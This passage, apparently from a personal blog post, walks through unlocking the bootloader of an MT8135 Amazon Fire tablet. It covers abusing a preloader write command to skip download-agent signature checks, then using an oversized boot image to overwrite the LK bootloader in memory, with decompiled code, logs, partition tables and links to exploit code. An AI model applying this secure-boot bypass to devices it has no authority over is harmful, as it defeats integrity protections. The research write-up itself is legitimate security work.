&lt;pre&gt;&lt;code&gt;#define CMD_GET_HW_SW_VER          0xfc  // Get hardware and software version information from the device
#define CMD_GET_HW_CODE            0xfd  // Retrieve the hardware code that identifies the SoC model
#define CMD_GET_BL_VER             0xfe  // Get bootloader version currently running on the device
#define CMD_LEGACY_WRITE           0xa1  // Legacy write command for backward compatibility with older SoCs
#define CMD_LEGACY_READ            0xa2  // Legacy read command for backward compatibility with older SoCs
#define CMD_READ32                 0xD1  // Read 32-bit value from specified memory address within allowed range
#define CMD_WRITE32                0xD4  // Write 32-bit value to specified memory address within allowed range
#define CMD_JUMP_DA                0xD5  // Jump to Download Agent at fixed address after verification
#define CMD_SEND_DA                0xD7  // Send Download Agent binary to device memory for execution
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Since I used &lt;code&gt;CMD_WRITE32&lt;/code&gt; in a lot of places, it&apos;s worth explaining how it works. This command writes one or more 32-bit values starting at a specific memory address. The host sends the command, the address, the number of 32-bit words, and then the words themselves, and the device echoes each of them back to confirm the operation.&lt;/p&gt;
&lt;p&gt;It&apos;s worth noting that there&apos;s a range check to ensure the address is within a valid range; otherwise, we wouldn&apos;t have to abuse the crypto engine at all.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        /*
         * there are quite a few cmds, but I skipped
         * their handlers to focus on CMD_WRITE32 which
         * is what we&apos;ll use.
         */
        uint32_t base_addr = 0;
        uint32_t data = 0;
        uint32_t len32 = 0;

        // receive the base address and the word count from the host,
        // echoing each one back.
        usbdl_get_dword(&amp;amp;base_addr);
        usbdl_put_dword(base_addr);
        usbdl_get_dword(&amp;amp;len32);
        usbdl_put_dword(len32);

        // check the alignment of the address.
        if ((base_addr &amp;amp; 3) != 0) goto err_and_ret;

        // make sure the size is actually valid.
        if (len32 == 0) goto err_and_ret;

        // reject word counts whose byte size (len32 * 4) wraps around.
        if (len32 &amp;lt;&amp;lt; 2 &amp;lt;= len32) goto err_and_ret;

        // check if the address range is valid.
        sec_region_check(base_addr, len32 &amp;lt;&amp;lt; 2);
        // ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Next, the device enters a loop to receive the data from the host, echoing each 32-bit word back and writing it to consecutive addresses starting at the base address. Once all the words have been written, the handler goes back to waiting for the next command.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        /*
         * if we reach this point, all the checks have passed
         * and we can notify the host about it so it can start
         * sending us the data we need to write.
         */
        usbdl_put_word(0);

        for (index = 0; index &amp;lt; len32; index = index + 1) {
            usbdl_get_dword(&amp;amp;data);
            usbdl_put_dword((uint32_t)data);
            *(uint32_t *)(base_addr + index * 4) = data;
        }
    }
    /*
     * the rest of the command handler would follow here, I
     * decided to omit it to keep this portion simpler.
     */
    return 0;
}
&lt;/code&gt;&lt;/pre&gt;
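&lt;p&gt;Seen from the host side, the exchange handled above could be sketched roughly like this. The function name &lt;code&gt;write32_frames&lt;/code&gt; is hypothetical, and the big-endian 32-bit packing is an assumption based on the &lt;code&gt;struct.pack&lt;/code&gt; call visible in the earlier traceback. The sketch only builds the chunks the host would send; on a real device each chunk is echoed back, and a 16-bit status word arrives after the word count.&lt;/p&gt;

```python
import struct

CMD_WRITE32 = 0xD4  # value taken from the command list above


def write32_frames(addr, words):
    """Return the chunks a host would send for one CMD_WRITE32 exchange."""
    if addr % 4 != 0:
        raise ValueError("address must be 4-byte aligned")
    if not words:
        raise ValueError("at least one word is required")
    frames = [bytes([CMD_WRITE32])]               # command byte
    frames.append(struct.pack(">I", addr))        # base address
    frames.append(struct.pack(">I", len(words)))  # number of 32-bit words
    for word in words:
        frames.append(struct.pack(">I", word))    # one data word per frame
    return frames


frames = write32_frames(0x80001000, [0xFA000025, 0xB5072300])
print([frame.hex() for frame in frames])
```

&lt;p&gt;Keeping the framing separate from the USB I/O makes it easy to compare every echoed chunk against what was sent.&lt;/p&gt;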
&lt;p&gt;The next interesting command is &lt;code&gt;CMD_JUMP_DA&lt;/code&gt;, which is used to jump to a Download Agent (DA) located at a fixed memory address. Naturally, the DA sent by the host has to be signed for this command to actually work and not crash.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (local_41 == 0xd5) {
  usbdl_get_dword(&amp;amp;da_addr);
  usbdl_put_dword((uint32_t)da_addr);
  if (g_da_verified == 1) {
    status = 0;
  }
  else {
    status = 0x2001; // DA_IMAGE_SIG_VERIFY_FAIL
  }
  usbdl_put_word((uint16_t)status);
  if (status != 0) {
    dprintf(&quot;%s usbdl_jump_da: %x\n&quot;,&quot;[USBDL]&quot;,status);
    ASSERT(&quot;download.c&quot;,0x282,&quot;0&quot;); // crash and reboot
  }
  da_addr = &amp;amp;DAT_80001000;
  _da_arg-&amp;gt;magic = 0x58885168;
  _da_arg-&amp;gt;ver = 1;
  _da_arg-&amp;gt;flags = 3;
  // ...
  g_boot_mode = 100;
  bldr_jump((uint32_t)da_addr,0x80000ff4,0xc);
  // ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, as we can see, if &lt;code&gt;g_da_verified&lt;/code&gt; is set to &lt;strong&gt;1&lt;/strong&gt;, the device will jump to the fixed address &lt;code&gt;0x80001000&lt;/code&gt; and execute the DA. If the DA is not verified, the device will crash and reboot.&lt;/p&gt;
&lt;p&gt;We know that &lt;code&gt;aes_write16&lt;/code&gt; and &lt;code&gt;aes_read16&lt;/code&gt; can be used starting from address &lt;code&gt;0x80000000&lt;/code&gt;, so we can technically upload the payload in chunks of 16 bytes and then call it a day!&lt;/p&gt;
&lt;p&gt;Oh, but there&apos;s a catch. As we&apos;ve seen, &lt;code&gt;g_da_verified&lt;/code&gt; is only set to 1 if the DA is signed. After countless hours of trying to bypass this restriction, out of mere desperation, I tried to write to that global variable with &lt;code&gt;CMD_WRITE32&lt;/code&gt; and... it worked! I was able to set it to 1 and jump to my own payload.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[2024-07-21 02:02:21.020854] Waiting for Preloader
[2024-07-21 02:02:40.487613] Found port = /dev/ttyACM0
[2024-07-21 02:02:40.527277] Handshake
[2024-07-21 02:02:40.549432] Disable watchdog
[2024-07-21 02:02:40.549937] Init crypto engine
[2024-07-21 02:02:40.565977] Disable DA verification check
[2024-07-21 02:02:40.566455] Load payload from ../brom-payload/pl/pl.bin = 0x3BB2 bytes
[2024-07-21 02:02:48.838860] Let&apos;s rock
[2024-07-21 02:02:48.839156] Wait for the payload to come online...
[2024-07-21 02:02:50.813918] all good
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;[PLFM] USB cable in
[TOOL] USB enum timeout (Yes), handshake timeout(Yes)
[USBD] USB Full Speed
[TOOL] Enumeration(Start)
[USBD] USB High Speed
[USBD] USB High Speed
[TOOL] Enumeration(End): OK 537ms 
[TOOL] sync time 277ms
[BLDR] jump to 0x80001000
[BLDR] &amp;lt;0x80001000&amp;gt;=0xFA000025
[BLDR] &amp;lt;0x80001004&amp;gt;=0xB5072300
[R0rt1z2] Hello from the other side!
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;At this point, I was able to upload my own payload to the device and execute it. I simply based it on k4y0z&apos;s Preloader-based payload for mantis and called it a day.&lt;/p&gt;
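&lt;p&gt;The chunked upload can be sketched as follows. This only shows how a payload would be split into 16-byte pieces for the fixed DA address; the helper name &lt;code&gt;payload_chunks&lt;/code&gt; and the zero padding of the last chunk are assumptions, and the actual &lt;code&gt;aes_write16&lt;/code&gt; call is left out.&lt;/p&gt;

```python
DA_LOAD_ADDR = 0x80001000  # fixed jump target seen in the CMD_JUMP_DA handler
CHUNK_SIZE = 16            # aes_write16 moves 16 bytes per call


def payload_chunks(payload, base=DA_LOAD_ADDR):
    """Split a payload into (address, 16-byte chunk) pairs."""
    # Assumption: the last chunk is padded with zeros up to 16 bytes.
    padded = payload + b"\x00" * (-len(payload) % CHUNK_SIZE)
    return [
        (base + offset, padded[offset:offset + CHUNK_SIZE])
        for offset in range(0, len(padded), CHUNK_SIZE)
    ]


# Dummy payload with the same size as the one in the log above (0x3BB2 bytes).
chunks = payload_chunks(bytes(0x3BB2))
print(len(chunks), hex(chunks[0][0]), hex(chunks[-1][0]))
```

&lt;p&gt;Each pair would then be passed to &lt;code&gt;aes_write16&lt;/code&gt; in order, before flipping &lt;code&gt;g_da_verified&lt;/code&gt; and sending &lt;code&gt;CMD_JUMP_DA&lt;/code&gt;.&lt;/p&gt;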
&lt;p&gt;As for bootROM, when I tried to dump &lt;code&gt;0x0&lt;/code&gt; (with the payload, that is), I got the following output:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;00000000  04 f0 1f e5 00 10 00 12  04 f0 1f e5 00 10 00 12  |................|
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As we&apos;ve seen before, this is a jump instruction, which in this case redirects execution to &lt;code&gt;0x12001000&lt;/code&gt;. Doesn&apos;t this sound familiar? Yes, it&apos;s where PL1 gets loaded as well. So when I tried to dump that address, I was greeted by PL1 instead of bootROM.&lt;/p&gt;
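&lt;p&gt;To double-check that reading of the hexdump, here is a small sketch that decodes the first eight bytes by hand. The helper name &lt;code&gt;ldr_pc_target&lt;/code&gt; is hypothetical, and it only recognises this one instruction encoding.&lt;/p&gt;

```python
LDR_PC_PC_MINUS_4 = 0xE51FF004  # ARM encoding of `ldr pc, [pc, #-4]`


def ldr_pc_target(raw):
    """Return the address loaded into pc by a leading `ldr pc, [pc, #-4]`."""
    insn = int.from_bytes(raw[0:4], "little")
    if insn != LDR_PC_PC_MINUS_4:
        raise ValueError(f"unexpected instruction 0x{insn:08x}")
    # In ARM state, pc reads as the instruction address + 8, so
    # [pc, #-4] points at the word right after the instruction.
    return int.from_bytes(raw[4:8], "little")


dump = bytes.fromhex("04f01fe500100012")
print(hex(ldr_pc_target(dump)))
```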
&lt;p&gt;I didn&apos;t pursue this any further, as it seemed like I had hit a dead end. The only way to dump bootROM at this point would be to gain arbitrary code execution before PL1 gets loaded, which is fairly complicated.&lt;/p&gt;
&lt;h2&gt;Unlocking the bootloader&lt;/h2&gt;
&lt;p&gt;After successfully gaining direct read/write access to the eMMC, the next step was to find a way to exploit the LK to permanently unlock the bootloader.&lt;/p&gt;
&lt;p&gt;The first idea that came to mind was to use amonet&apos;s microloader, porting it from ford to ariel (considering they&apos;re very similar). However, I wondered, is it going to be that easy? That&apos;s what I was about to find out...&lt;/p&gt;
&lt;p&gt;As explained in my previous article, microloader works by crafting a malicious boot image with a user-controlled kernel load address. This allows it to overwrite a portion of the LK (the one loaded into RAM and running at runtime) with a ROP chain, which is then executed by pivoting the stack.&lt;/p&gt;
&lt;p&gt;This would be perfect... if only it had worked. I did a quick test on my device and was greeted with an image verification failure.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[1250]  &amp;gt; page count of kernel image = 2
[1260] Verifying kernel...
[1260] [HW CRYPTO LK] AXI = 0x0000885b
[1260] [HW CRYPTO LK] AXI = 0x0000885b
[1270] Error: fail to check 0xBC for pkcs_1_pss_decode_sha256 operation
[1270] [VERIFY_BOOTIMG] Error: fail to do pss decode for boot data.
[1280] [MBOOT] Load &apos;Android Boot Image&apos; partition Error
[1290] 
[1290] *******************************************************
[1290] *ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR*
[1300] *******************************************************
[1300] &amp;gt; Please check kernel and rootfs in Android Boot Image are both correct.
[1310] *******************************************************
[1310] *ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR.ERROR*
[1320] *******************************************************
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, what&apos;s going on? Why doesn&apos;t it crash LK instead, considering we&apos;re technically overwriting it? To get to the bottom of this, I decided to reverse engineer my LK image.&lt;/p&gt;
&lt;p&gt;While doing so, I discovered that the load address specified in the header of the boot image is actually ignored. Regardless of what address you choose, the bootloader will always use &lt;code&gt;0x80208000&lt;/code&gt; as the kernel load address.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// ... this is app(). After performing some initializations, 
// LK proceeds to load either a boot image, a recovery image, 
// or a factory image. Under all circumstances, it hardcodes 
// the load address.
ret = mboot_android_load_bootimg_hdr(&quot;boot&quot;, 0x80208000); // header
if (-1 &amp;lt; ret) {
  ret = mboot_android_load_bootimg(&quot;boot&quot;, 0x80208000); // image
  if (ret &amp;lt; 0) {
      msg_img_error(&quot;Android Boot Image&quot;); // error and trigger assert()
  }
} else {
  msg_header_error(&quot;Android Boot Image&quot;); // error and trigger assert()
}
// ...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;As you can see, the second parameter of &lt;code&gt;mboot_android_load_bootimg&lt;/code&gt; (which is the function amonet exploits) is a hardcoded load address. This address is then used to load the kernel into memory:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int mboot_android_load_bootimg(char *part_name, ulong addr) {
    part_dev_t *dev;
    part_t *part;
    int ret;
    uint64_t offset;

    dev = mt_part_get_device();
    if (dev == NULL) {
        dprintf(&quot;mboot_android_load_bootimg , dev = NULL\n&quot;);
        return -0x13;
    }

    part = mt_part_get_partition(part_name);
    if (part == (part_t *)0xffffffff) {
        dprintf(&quot;mboot_android_load_bootimg , part = NULL\n&quot;);
        return -2;
    }

    offset = partition_get_offset((int)part);
    // load whatever the data is to 0x80208000
    ret = dev-&amp;gt;read(dev, addr, (uchar *)addr, (int)offset);

    if (verify_img(1, addr, _DAT_81e6c420, 0) == 0) {
        if (is_prod_dev()) {
            FUN_81e3f6a0(&quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;, &quot;%s androidboot.prod=1&quot;, &quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;);
        } else {
            FUN_81e3f6a0(&quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;, &quot;%s androidboot.prod=0&quot;, &quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;);
        }
    } else {
        dprintf(&quot;failed to verify boot image. size :0x%x&quot;, _DAT_81e6c420);
        return -5;
    }

    return ret;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If you&apos;re quick enough (unlike me :P), you might have noticed that although the address is hardcoded, the verification of the data is carried out &lt;strong&gt;AFTER&lt;/strong&gt; the image is loaded into memory.&lt;/p&gt;
&lt;p&gt;Great, so how is this helpful to us? Well, this is where math comes in handy. We know that:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;LK&apos;s load address in memory is &lt;code&gt;0x81E00000&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The kernel load address in memory is &lt;code&gt;0x80208000&lt;/code&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Notice that LK is placed &lt;strong&gt;AFTER&lt;/strong&gt; (sometimes I wonder if MediaTek engineers are just plain stupid) the kernel in memory. Since the image is copied to RAM before it gets verified, flashing a huge boot image could technically overwrite the loaded LK, giving us the ability to execute arbitrary code.&lt;/p&gt;
&lt;p&gt;The difference between the two addresses is &lt;code&gt;0x81E00000 - 0x80208000 = 0x1BF8000&lt;/code&gt;, which is just under 28 MiB, so a boot image of roughly 30 MB is more than enough to reach LK. Do you see where I&apos;m going with this?&lt;/p&gt;
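&lt;p&gt;The arithmetic is easy to verify with a few lines of Python. The helper name &lt;code&gt;reaches_lk&lt;/code&gt; is made up for this sketch, and it assumes that the first byte of the image lands exactly at the kernel load address.&lt;/p&gt;

```python
LK_BASE = 0x81E00000      # where LK runs in RAM
KERNEL_LOAD = 0x80208000  # hardcoded boot image load address

gap = LK_BASE - KERNEL_LOAD


def reaches_lk(image_size):
    """True if an image of this size, copied to KERNEL_LOAD, spills into LK."""
    return image_size > gap


print(hex(gap), gap, round(gap / 2**20, 2))
print(reaches_lk(8 * 2**20), reaches_lk(30 * 2**20))
```

&lt;p&gt;An image that fits in a stock 8 MiB partition never gets close to LK, while a 30 MiB one goes well past its base address.&lt;/p&gt;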
&lt;h3&gt;Modifying the GPT&lt;/h3&gt;
&lt;p&gt;This step was quite easy, considering that we had done it before on sloane to exploit LK in the same way. The idea is to rename the original &lt;code&gt;recovery&lt;/code&gt; and &lt;code&gt;boot&lt;/code&gt; partitions to &lt;code&gt;recovery_x&lt;/code&gt; and &lt;code&gt;boot_x&lt;/code&gt;, then shrink &lt;code&gt;userdata&lt;/code&gt; and create two &lt;strong&gt;30 MB partitions&lt;/strong&gt; called &lt;code&gt;boot&lt;/code&gt; and &lt;code&gt;recovery&lt;/code&gt; (which are what LK will pick up).&lt;/p&gt;
&lt;p&gt;Since we don&apos;t have much internal storage on ariel (it&apos;s either 8 GB for the HD7 or 16 GB for the HD6), I decided to shrink the &lt;code&gt;cache&lt;/code&gt; partition instead, which has a total size of roughly 1 GB. In any case, the resulting GPT looked like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  Number   Start (sector)     End (sector)  Size          Name
      1               64              319  128.00 KiB    PRO_INFO
      2             2048            10239  4.00 MiB      PMT
      3            10240            20479  5.00 MiB      TEE1
      4            20480            30719  5.00 MiB      TEE2
      5            30720            31743  512.00 KiB    UBOOT
-     6            31744            48127  8.00 MiB      boot
-     7            48128            64511  8.00 MiB      recovery
+     6            31744            48127  8.00 MiB      boot_x
+     7            48128            64511  8.00 MiB      recovery_x
      8            64512            66559  1024.00 KiB   KB
      9            66560            68607  1024.00 KiB   DKB
     10            68608            69631  512.00 KiB    MISC
     11            69632           102399  16.00 MiB     persisbackup
     12           102400          2559999  1.17 GiB      system
-    13          2560000          4239359  1.00 GiB      cache
+    13          2560000          4239359  820.00 MiB    cache
+    14          4239360          4300799  30.00 MiB     boot
+    15          4300800          4362239  30.00 MiB     recovery
     16          4362240         30527454  12.48 GiB     userdata
&lt;/code&gt;&lt;/pre&gt;
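&lt;p&gt;The sizes of the new entries can be cross-checked from their sector ranges. This is just a sanity-check sketch; it assumes 512-byte sectors, and &lt;code&gt;size_mib&lt;/code&gt; is a helper name I made up for it.&lt;/p&gt;

```python
SECTOR_SIZE = 512  # bytes per sector (assumed)


def size_mib(start, end):
    """Size in MiB of a partition spanning sectors start..end inclusive."""
    return (end - start + 1) * SECTOR_SIZE / 2**20


# Sector ranges of the modified entries in the table above.
for name, start, end in [
    ("cache", 2560000, 4239359),
    ("boot", 4239360, 4300799),
    ("recovery", 4300800, 4362239),
]:
    print(f"{name:10s} {size_mib(start, end):8.2f} MiB")
```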
&lt;h3&gt;Crafting the malicious boot image&lt;/h3&gt;
&lt;p&gt;Once we had the GPT ready, the next step was to craft a (big enough) boot image that would overwrite LK in memory. On older devices, a ROP chain was used to redirect execution to the payload, but over time we (k4y0z, t0x1cSH and I) realized it wasn&apos;t necessary.&lt;/p&gt;
&lt;p&gt;One could just overwrite a function that gets called once the image has been loaded with a direct jump to the payload. In the case of ariel, I decided to overwrite &lt;code&gt;0x81e099e8&lt;/code&gt;, which is the function used to verify the boot image:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int verify_img(int flag, void *img, uint p3, uint p4) {
    char status = *(char *)(_DAT_81e81258 + 0x16);
    int ret;

    if (status == &apos;\x01&apos;) {
        dprintf(&quot;Device or user build unlocked, or non-user build on engineering device! Skip kernel verification.\n&quot;);
        if (flag != 0) {
            flag = 0;
            sprintf(&quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;,
                    &quot;%s androidboot.unlocked_kernel=true&quot;,
                    &quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;);
        }
    } else if (status == &apos;\x02&apos;) {
        dprintf(&quot;Verifying kernel with engineering key...\n&quot;);
        ret = verify_img_type(img, p3, 1);
        if (ret != 0) {
            ret = -5;
        }
        return ret;
    } else {
        if (!is_prod_dev()) {
            dprintf(&quot;User build on engineering device. Skip verification.\n&quot;);
            return 0;
        }
        dprintf(&quot;Verifying kernel...\n&quot;);
        ret = verify_img_type(img, p3, 0);
        if (ret == 0) {
            if (flag != 0) {
                flag = 0;
                sprintf(&quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;,
                        &quot;%s androidboot.unlocked_kernel=false&quot;,
                        &quot;console=tty0 console=ttyMT3,115200n1 root=/dev/ram&quot;);
            }
            return 0;
        } else {
            flag = -5;
        }
    }
    return flag;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I simply &lt;a href=&quot;https://github.com/R0rt1z2/amonet&quot;&gt;forked sloane&apos;s amonet repository&lt;/a&gt; and modified the &lt;code&gt;create_boot_img.py&lt;/code&gt; script to suit my needs. The result can be found &lt;a href=&quot;https://github.com/R0rt1z2/amonet/blob/mt8135-ariel/lk-payload/create_boot_img.py&quot;&gt;here&lt;/a&gt;, and it generated the following image:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Payload Address: 0x81dff000
Payload Block:   57271
Part Size:       29763948 (28.39 MiB / 58133 Blocks)
Writing ../bin/boot.hdr...
Writing ../bin/boot.payload...
&lt;/code&gt;&lt;/pre&gt;
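&lt;p&gt;As a quick sanity check of those numbers, the sketch below confirms that the generated image is large enough to run past LK&apos;s base address while still fitting in the new 30 MiB partition. The 512-byte block size is an assumption, and the constants are copied from the output above.&lt;/p&gt;

```python
BLOCK_SIZE = 512               # assumed block size behind the "Blocks" figure
GAP = 0x81E00000 - 0x80208000  # distance from the load address to LK
PART_SIZE = 29763948           # "Part Size" reported above, in bytes

blocks = -(-PART_SIZE // BLOCK_SIZE)  # ceiling division
print(blocks, round(PART_SIZE / 2**20, 2))
print(PART_SIZE > GAP, 30 * 2**20 >= PART_SIZE)
```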
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/meme.jpg&quot; width=&quot;60%&quot; alt=&quot;RE meme&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;Lastly, I modified the bootROM-based Python scripts to automatically patch the GPT, downgrade bootloader images, and flash the payload to the corresponding block.&lt;/p&gt;
&lt;p&gt;It took me a few attempts, but after adjusting some minor details, like using BL instead of BLX (unlike the original sloane exploit), I managed to jump to the payload and unlock the bootloader!&lt;/p&gt;
&lt;div align=&quot;center&quot;&gt;
  &lt;img src=&quot;https://cdn.r0rt1z2.com/blog/hacked-fastboot.jpg&quot; width=&quot;60%&quot; alt=&quot;Hacked fastboot mode&quot; /&gt;
&lt;/div&gt;
&lt;p&gt;The functionality of the payload itself is the same as the one explained in my previous article. I just had to modify some parts to make it compatible with such an old device, such as the &lt;code&gt;dev-&amp;gt;read&lt;/code&gt; and &lt;code&gt;dev-&amp;gt;write&lt;/code&gt; operations. You can check the full code &lt;a href=&quot;https://github.com/R0rt1z2/amonet/blob/mt8135-ariel/lk-payload/main.c&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Demo of the PoC in action&lt;/h2&gt;

&lt;h2&gt;Bonus: LineageOS 12.1&lt;/h2&gt;
&lt;p&gt;Considering how slow FireOS is, I decided it would be a great idea to have a smooth AOSP-based ROM. Since my motivation to build ROMs has been waning over the past few years, I didn&apos;t feel like bringing something newer than the latest stock version. Instead, I decided to build &lt;a href=&quot;https://github.com/lineageos-lollipop&quot;&gt;LineageOS 12.1&lt;/a&gt; (formerly known as CyanogenMod 12.1) and make it as stable as possible.&lt;/p&gt;
&lt;p&gt;After a few weeks of work, I managed to build a pretty solid ROM that feels far faster than FireOS and is much more customizable. At the time of writing, the only known bug is video recording, which crashes the Camera application. All the sources used to build both TWRP and LineageOS 12.1 can be found in &lt;a href=&quot;https://github.com/amazon-oss/&quot;&gt;this GitHub organization&lt;/a&gt;.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Screenshot 1&lt;/th&gt;
&lt;th&gt;Screenshot 2&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lineage-01.png&quot; alt=&quot;LineageOS 12.1&quot; /&gt;&lt;/td&gt;
&lt;td&gt;&lt;img src=&quot;https://cdn.r0rt1z2.com/blog/lineage-02.png&quot; alt=&quot;LineageOS 12.1&quot; /&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;Conclusions&lt;/h2&gt;
&lt;p&gt;This was a fun journey, and I&apos;m glad I managed to unlock the bootloader and build a custom ROM for the device. This process has taught me a lot about MediaTek devices and how they work at a low level.&lt;/p&gt;
&lt;p&gt;I&apos;d like to thank &lt;a href=&quot;https://github.com/chaosmaster&quot;&gt;k4y0z&lt;/a&gt;, &lt;a href=&quot;https://github.com/raffy909&quot;&gt;t0x1cSH&lt;/a&gt;, and &lt;a href=&quot;https://github.com/AntiEngineer&quot;&gt;AntiEngineer&lt;/a&gt; for helping me with this project, both software and hardware-wise. I&apos;d also like to thank &lt;a href=&quot;https://gitlab.com/zeroepoch&quot;&gt;zeroepoch&lt;/a&gt; and &lt;a href=&quot;https://github.com/xyzz&quot;&gt;xyz&lt;/a&gt; for their amazing work on MediaTek devices. Nothing would have been possible without their contributions.&lt;/p&gt;
&lt;p&gt;With this, I&apos;m finishing this article. I hope you enjoyed reading it as much as I enjoyed writing it :)&lt;/p&gt;
</content:encoded></item></channel></rss>